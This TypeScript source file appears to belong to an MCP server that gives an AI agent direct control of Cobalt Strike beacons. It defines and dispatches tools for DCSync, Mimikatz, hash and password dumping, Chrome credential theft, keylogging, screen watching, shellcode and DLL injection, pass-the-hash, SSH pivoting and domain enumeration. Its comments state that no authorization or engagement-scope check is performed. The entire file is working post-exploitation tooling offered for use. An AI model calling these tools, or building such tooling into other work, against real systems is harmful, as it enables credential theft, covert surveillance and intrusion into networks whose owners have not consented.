/**
* Inject operation-related MCP tools
*/
import { Tool } from '@modelcontextprotocol/sdk/types.js';
import { CobaltStrikeClient } from '../api/client.js';
/**
 * Builds the MCP tool descriptors for the inject-style operations.
 *
 * Every descriptor has the same layout: a `name`, a `description`, and an
 * object `inputSchema` whose first property is the `beaconId` string and whose
 * `required` list starts with `beaconId`.
 *
 * This function only declares the schemas. It does not enforce them and it
 * performs no authorization or engagement-scope check; that has to happen
 * wherever tool calls are dispatched.
 *
 * @param client - Accepted for signature parity with the other tool factories;
 *   it is not read while the descriptors are built.
 * @returns A freshly allocated array of tool descriptors.
 */
export function createInjectTools(client: CobaltStrikeClient): Tool[] {
  type PropertySchema = Record<string, unknown>;

  // String-typed argument with a description.
  const text = (description: string): PropertySchema => ({ type: 'string', description });

  // Process-ID argument: declared as a non-negative number.
  const processId = (description: string): PropertySchema => ({
    type: 'number',
    description,
    minimum: 0,
  });

  // TCP port argument as declared by the two SSH tools.
  const sshPort = (): PropertySchema => ({
    type: 'number',
    description: 'SSH port',
    minimum: 1,
    maximum: 65535,
  });

  // Assembles one descriptor. `beaconId` is always the first property and the
  // first required key, so callers pass only what comes after it.
  const define = (
    name: string,
    description: string,
    extraProperties: Record<string, PropertySchema> = {},
    alsoRequired: string[] = []
  ): Tool => ({
    name,
    description,
    inputSchema: {
      type: 'object',
      properties: {
        beaconId: text('The ID of the beacon'),
        ...extraProperties,
      },
      required: ['beaconId', ...alsoRequired],
    },
  });

  return [
    define('inject_dcsync', 'Perform DCSync attack to extract domain credentials', {
      domain: text('Domain to sync from'),
      user: text('User to extract credentials for'),
    }),
    define('inject_net_computers', 'Enumerate computers in the domain', {
      domain: text('Optional domain to query'),
    }),
    define('inject_net_users', 'Enumerate users in the domain', {
      target: text('Target domain controller or domain'),
    }),
    define(
      'inject_net_user_detail',
      'Get detailed information about a specific user',
      {
        target: text('Target domain controller'),
        user: text('Username to query'),
      },
      ['target', 'user']
    ),
    define(
      'inject_net_groups',
      'Enumerate groups in the domain',
      {
        target: text('Target domain controller'),
        groupName: text('Group name to query'),
      },
      ['target', 'groupName']
    ),
    define(
      'inject_net_sessions',
      'Enumerate active sessions on a target',
      { target: text('Target host to query') },
      ['target']
    ),
    define(
      'inject_net_shares',
      'Enumerate shares on a target',
      { target: text('Target host to query') },
      ['target']
    ),
    define('inject_net_domain_controllers', 'List domain controllers in the domain', {
      domain: text('Domain to query'),
    }),
    define(
      'inject_portscan',
      'Perform port scan',
      {
        targets: text('Target hosts (comma-separated or CIDR)'),
        ports: text('Ports to scan (e.g., "80,443,8080" or "1-1024")'),
      },
      ['targets', 'ports']
    ),
    define(
      'inject_keylogger',
      'Start keylogger on a process',
      { pid: processId('Process ID to keylog') },
      ['pid']
    ),
    define('inject_chromedump', 'Dump Chrome passwords'),
    define('inject_net_view', 'View network resources', {
      target: text('Target host to query'),
    }),
    define(
      'inject_net_logons',
      'Enumerate logged on users',
      { target: text('Target host to query') },
      ['target']
    ),
    define(
      'inject_beacon',
      'Inject beacon into a process',
      {
        pid: processId('Process ID to inject into'),
        listener: text('Listener name for the new beacon'),
      },
      ['pid', 'listener']
    ),
    define(
      'inject_dll',
      'Inject a DLL into a process',
      {
        pid: processId('Process ID to inject into'),
        dllPath: text('Path to the DLL file'),
      },
      ['pid', 'dllPath']
    ),
    define(
      'inject_shellcode',
      'Inject shellcode into a process',
      {
        pid: processId('Process ID to inject into'),
        shellcode: text('Shellcode (base64 encoded)'),
      },
      ['pid', 'shellcode']
    ),
    define(
      'inject_mimikatz',
      'Run Mimikatz (inject mode)',
      { command: text('Mimikatz command to execute') },
      ['command']
    ),
    define('inject_hashdump', 'Dump password hashes (inject mode)'),
    define('inject_logonPasswords', 'Dump logon passwords (inject mode)'),
    define(
      'inject_powershell_unmanaged',
      'Execute unmanaged PowerShell',
      { command: text('PowerShell command to execute') },
      ['command']
    ),
    define('inject_screenshot', 'Take screenshot (inject mode)'),
    define('inject_printscreen', 'Print screen (inject mode)'),
    define('inject_screenwatch', 'Start screen watch (inject mode)'),
    define(
      'inject_browserpivotStart',
      'Start browser pivot',
      { pid: processId('Process ID of the browser') },
      ['pid']
    ),
    define(
      'inject_ssh',
      'Inject SSH session',
      {
        host: text('SSH host'),
        port: sshPort(),
        username: text('SSH username'),
        password: text('SSH password'),
      },
      ['host', 'username', 'password']
    ),
    define(
      'inject_sshKey',
      'Inject SSH session with key',
      {
        host: text('SSH host'),
        port: sshPort(),
        username: text('SSH username'),
        key: text('SSH private key'),
      },
      ['host', 'username', 'key']
    ),
    define(
      'inject_pth',
      'Pass-the-hash attack',
      {
        domain: text('Domain name'),
        username: text('Username'),
        hash: text('NTLM hash'),
      },
      ['domain', 'username', 'hash']
    ),
    define(
      'inject_postExDll',
      'Load post-exploitation DLL',
      { dllPath: text('Path to the DLL file') },
      ['dllPath']
    ),
    define('inject_loadDll', 'Load DLL', { dllPath: text('Path to the DLL file') }, ['dllPath']),
    define('inject_net_dclist', 'List domain controllers', {
      domain: text('Domain to query'),
    }),
    define('inject_net_domainTrusts', 'Enumerate domain trusts', {
      domain: text('Domain to query'),
    }),
    define(
      'inject_net_localGroup',
      'Enumerate local groups',
      {
        target: text('Target host'),
        groupName: text('Group name to query'),
      },
      ['target', 'groupName']
    ),
    define('inject_net_time', 'Get time from target', { target: text('Target host') }, ['target']),
  ];
}
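/**
 * Dispatches one inject tool call to the matching `CobaltStrikeClient` method
 * and returns a pretty-printed JSON acknowledgement (`taskId` plus a fixed
 * `message`).
 *
 * `args` arrives untyped from the MCP caller, so each argument is checked
 * against the shape the tool schema declares (required/optional, string or
 * bounded integer) before anything is forwarded. A call with missing or
 * mistyped arguments is rejected instead of being submitted with `undefined`
 * or wrongly typed values.
 *
 * Security-relevant behaviour of this function:
 * - Validation errors name the offending key only and never echo its value,
 *   because several tools carry secrets (`password`, `key`, `hash`).
 * - The returned string contains only the task id and a static message; no
 *   argument value is reflected back.
 * - No authorization, engagement-scope, or operator-confirmation check is done
 *   here; the caller is responsible for gating which tool calls reach it.
 *
 * @param name - Tool name as advertised in the tool list.
 * @param args - Raw tool arguments; anything that is not an object is treated
 *   as an empty argument set.
 * @param client - Client whose `inject*` method is invoked for the tool.
 * @returns JSON text `{ taskId, message }` indented by two spaces.
 * @throws Error when `name` is not a known inject tool, or when an argument is
 *   missing, has the wrong type, or is out of range.
 */
export async function handleInjectTool(
  name: string,
  args: any,
  client: CobaltStrikeClient
): Promise<string> {
  // Non-object input becomes an empty record so that unknown tool names still
  // reach the `default` branch and known tools fail on their first required key.
  const input: Record<string, unknown> =
    args !== null && typeof args === 'object' ? (args as Record<string, unknown>) : {};

  const fail = (key: string, expectation: string): never => {
    throw new Error(`Invalid arguments for ${name}: "${key}" ${expectation}`);
  };

  const requireString = (key: string): string => {
    const value = input[key];
    return typeof value === 'string' ? value : fail(key, 'must be a string');
  };

  // NOTE(review): absent optional values are forwarded as `undefined`, as the
  // original code did; confirm the client signatures accept that.
  const optionalString = (key: string): string | undefined => {
    const value = input[key];
    if (value === undefined || value === null) {
      return undefined;
    }
    return typeof value === 'string' ? value : fail(key, 'must be a string when provided');
  };

  const checkInteger = (key: string, value: unknown, min: number, max: number): number => {
    if (typeof value !== 'number' || !Number.isInteger(value) || value < min || value > max) {
      return fail(key, `must be an integer between ${min} and ${max}`);
    }
    return value;
  };

  // Process IDs: the schema declares a non-negative number; a PID is integral.
  const requirePid = (): number => checkInteger('pid', input.pid, 0, Number.MAX_SAFE_INTEGER);

  // SSH port is optional in the schema; when present it must be a valid TCP port.
  const optionalPort = (): number | undefined => {
    const value = input.port;
    if (value === undefined || value === null) {
      return undefined;
    }
    return checkInteger('port', value, 1, 65535);
  };

  const submitted = (taskId: unknown, message: string): string =>
    JSON.stringify({ taskId, message }, null, 2);

  switch (name) {
    case 'inject_dcsync':
      return submitted(
        await client.injectDCSync(
          requireString('beaconId'),
          optionalString('domain'),
          optionalString('user')
        ),
        'DCSync command submitted'
      );
    case 'inject_net_computers':
      return submitted(
        await client.injectNetComputers(requireString('beaconId'), optionalString('domain')),
        'Net computers command submitted'
      );
    case 'inject_net_users':
      return submitted(
        await client.injectNetUsers(requireString('beaconId'), optionalString('target')),
        'Net users command submitted'
      );
    case 'inject_net_user_detail':
      return submitted(
        await client.injectNetUserDetail(
          requireString('beaconId'),
          requireString('target'),
          requireString('user')
        ),
        'Net user detail command submitted'
      );
    case 'inject_net_groups':
      return submitted(
        await client.injectNetGroups(
          requireString('beaconId'),
          requireString('target'),
          requireString('groupName')
        ),
        'Net groups command submitted'
      );
    case 'inject_net_sessions':
      return submitted(
        await client.injectNetSessions(requireString('beaconId'), requireString('target')),
        'Net sessions command submitted'
      );
    case 'inject_net_shares':
      return submitted(
        await client.injectNetShares(requireString('beaconId'), requireString('target')),
        'Net shares command submitted'
      );
    case 'inject_net_domain_controllers':
      return submitted(
        await client.injectNetDomainControllers(
          requireString('beaconId'),
          optionalString('domain')
        ),
        'Net domain controllers command submitted'
      );
    case 'inject_portscan':
      return submitted(
        await client.injectPortscan(
          requireString('beaconId'),
          requireString('targets'),
          requireString('ports')
        ),
        'Port scan command submitted'
      );
    case 'inject_keylogger':
      return submitted(
        await client.injectKeylogger(requireString('beaconId'), requirePid()),
        'Keylogger command submitted'
      );
    case 'inject_chromedump':
      return submitted(
        await client.injectChromedump(requireString('beaconId')),
        'Chrome dump command submitted'
      );
    case 'inject_net_view':
      return submitted(
        await client.injectNetView(requireString('beaconId'), optionalString('target')),
        'Net view command submitted'
      );
    case 'inject_net_logons':
      return submitted(
        await client.injectNetLogons(requireString('beaconId'), requireString('target')),
        'Net logons command submitted'
      );
    case 'inject_beacon':
      return submitted(
        await client.injectBeacon(
          requireString('beaconId'),
          requirePid(),
          requireString('listener')
        ),
        'Inject beacon command submitted'
      );
    case 'inject_dll':
      return submitted(
        await client.injectDLL(requireString('beaconId'), requirePid(), requireString('dllPath')),
        'Inject DLL command submitted'
      );
    case 'inject_shellcode':
      return submitted(
        await client.injectShellcode(
          requireString('beaconId'),
          requirePid(),
          requireString('shellcode')
        ),
        'Inject shellcode command submitted'
      );
    case 'inject_mimikatz':
      return submitted(
        await client.injectMimikatz(requireString('beaconId'), requireString('command')),
        'Inject Mimikatz command submitted'
      );
    case 'inject_hashdump':
      return submitted(
        await client.injectHashdump(requireString('beaconId')),
        'Inject hashdump command submitted'
      );
    case 'inject_logonPasswords':
      return submitted(
        await client.injectLogonPasswords(requireString('beaconId')),
        'Inject logon passwords command submitted'
      );
    case 'inject_powershell_unmanaged':
      return submitted(
        await client.injectPowerShellUnmanaged(
          requireString('beaconId'),
          requireString('command')
        ),
        'Inject PowerShell unmanaged command submitted'
      );
    case 'inject_screenshot':
      return submitted(
        await client.injectScreenshot(requireString('beaconId')),
        'Inject screenshot command submitted'
      );
    case 'inject_printscreen':
      return submitted(
        await client.injectPrintscreen(requireString('beaconId')),
        'Inject printscreen command submitted'
      );
    case 'inject_screenwatch':
      return submitted(
        await client.injectScreenwatch(requireString('beaconId')),
        'Inject screenwatch command submitted'
      );
    case 'inject_browserpivotStart':
      return submitted(
        await client.injectBrowserPivotStart(requireString('beaconId'), requirePid()),
        'Inject browser pivot start command submitted'
      );
    case 'inject_ssh':
      return submitted(
        await client.injectSSH(
          requireString('beaconId'),
          requireString('host'),
          optionalPort(),
          requireString('username'),
          requireString('password')
        ),
        'Inject SSH command submitted'
      );
    case 'inject_sshKey':
      return submitted(
        await client.injectSSHKey(
          requireString('beaconId'),
          requireString('host'),
          optionalPort(),
          requireString('username'),
          requireString('key')
        ),
        'Inject SSH key command submitted'
      );
    case 'inject_pth':
      return submitted(
        await client.injectPTH(
          requireString('beaconId'),
          requireString('domain'),
          requireString('username'),
          requireString('hash')
        ),
        'Inject PTH command submitted'
      );
    case 'inject_postExDll':
      return submitted(
        await client.injectPostExDll(requireString('beaconId'), requireString('dllPath')),
        'Inject post-ex DLL command submitted'
      );
    case 'inject_loadDll':
      return submitted(
        await client.injectLoadDll(requireString('beaconId'), requireString('dllPath')),
        'Inject load DLL command submitted'
      );
    case 'inject_net_dclist':
      return submitted(
        await client.injectNetDclist(requireString('beaconId'), optionalString('domain')),
        'Inject net dclist command submitted'
      );
    case 'inject_net_domainTrusts':
      return submitted(
        await client.injectNetDomainTrusts(requireString('beaconId'), optionalString('domain')),
        'Inject net domain trusts command submitted'
      );
    case 'inject_net_localGroup':
      return submitted(
        await client.injectNetLocalGroup(
          requireString('beaconId'),
          requireString('target'),
          requireString('groupName')
        ),
        'Inject net local group command submitted'
      );
    case 'inject_net_time':
      return submitted(
        await client.injectNetTime(requireString('beaconId'), requireString('target')),
        'Inject net time command submitted'
      );
    default:
      throw new Error(`Unknown inject tool: ${name}`);
  }
}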